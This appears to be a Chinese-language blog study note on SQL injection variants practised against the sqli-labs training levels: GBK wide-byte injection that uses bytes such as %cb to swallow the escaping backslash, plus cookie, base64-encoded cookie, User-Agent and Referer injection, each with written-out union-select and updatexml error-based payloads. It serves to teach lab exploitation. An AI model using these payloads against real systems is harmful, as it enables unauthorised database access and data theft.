sql注入的其他注入

1.宽字节注入

原因 绕过单双引号转义

?id=1

?id=1'

1\' 服务器会把单引号转义,单引号由原来的定义字符串的特殊字符被转义为普通字符。

315c27 非常强烈的暗示

代码

单双引号转义 并且编码变成了gbk

上编码 表

这个是GBK编码表:https://www.qqxiuzi.cn/zh/hanzi-gbk-bianma.php

双字节编码,两个字节作为一个汉字。GBK 编码范围8140,FEFE,注意到5C 在GBK 编码的低位范围之内40,FE。在5C 之前添加一个字符81,FE 之间,该字符就会和5c 组成一个汉字。

然后我们在单引号前面加个%cd就可以绕过

cb5c 5c前面加上cd都会得到一个新的字节 薥

?id=1%cb'

1%df\'

31cb5c27

1薥' # "吃"掉了转义字符\

/Less-32/?id=1%cb' and 1=2 union select 1,database(),3 --+

http头部 注入

SQL 注入点不止会出现在GET 参数或POST 参数中,也会出现在cookie和user-agent中。

1.cookie注入 20管

Cookie: uname=Dumb' and 1=2 union select 1,version(),database() exp攻击

1.登录

2.利用

2.base64编码 22关

Dumb" and 1=2 union select 1,version(),database()#

RHVtYiIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSx2ZXJzaW9uKCksZGF0YWJhc2UoKSM=

用bp把字符转成base64编码

1.登录

加密

直接上

3.user-agent 注入

随便一个' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1

4.referer注入

随便一个 ' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1

相关推荐
AI的探索之旅几秒前
从 Ubuntu 14.04 到 24.04:TI AM335x 开发环境完整迁移与 Agent 接管方案
linux·数据库·嵌入式硬件·ubuntu·postgresql
MatrixOrigin10 分钟前
MatrixOne Git4Data 技术详解(七)·数据运维实践篇:Write-Audit-Publish——给 ETL 流水线装一道发布门禁
sql·数据平台·ai-native·矩阵起源·git4data·matrixone
辰合软件39 分钟前
通达OA目录结构与核心文件解析
android·数据库·oracle
名不经传的养虾人1 小时前
从0到1:企业级AI项目迭代日记 Vol.61|记忆不是越多越好,装一道门比装满更重要
数据库·人工智能·ai编程·ai工作流·企业ai
霸道流氓气质1 小时前
Harness Engineering 从理论到实战:基于 Spring AI Alibaba 的完整实现指南
数据库·人工智能·spring·harness
linuxoffer1 小时前
MYSQL回收碎片空间
数据库·mysql
名字还没想好☜2 小时前
Go 并发实战:用 channel 实现 worker pool
java·数据库·后端·golang·go
源图客2 小时前
Claude Code基础使用
服务器·前端·数据库
阿里云大数据AI技术11 小时前
Hologres AI Function 文本分类实战:从提示词设计到 KV-Cache 调优,全程 SQL 搞定
人工智能·sql